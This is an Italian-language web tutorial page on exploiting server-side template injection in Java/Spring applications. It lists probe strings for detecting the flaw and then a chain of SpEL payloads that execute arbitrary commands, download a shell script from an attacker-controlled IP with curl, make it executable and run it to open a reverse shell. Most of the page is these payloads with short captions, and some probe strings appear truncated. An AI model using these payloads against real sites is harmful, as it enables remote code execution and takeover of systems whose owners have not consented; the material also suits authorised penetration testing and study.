Tutorials

Exploit

QUERY DA FARE PER CAPIRE SE IL SITO E' VULNERABILE

#exploitation#web

QUERY DA FARE PER CAPIRE SE IL SITO E' VULNERABILE 

bash
${88}



"{88}



{88}

per altre query: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#java

bash
{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('COMANDO DA ESEGUIRE').getInputStream())}
  • eseguire comando in un sito vulnerabile a SSTI 
bash
{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('curl



<YOUR_LOCAL_IP>:8000/shell.sh -o /tmp/shell.sh').getInputStream())}
  • scaricare shell da eseguire per creare reverse shell sulla nostra macchina
bash
{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('chmod +x /tmp/shell.sh').getInputStream())}
  • cambiare privilegi al file shell.sh 
bash
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('/bin/bash /tmp/shell.sh').getInputStream())}
  • eseguire shell.sh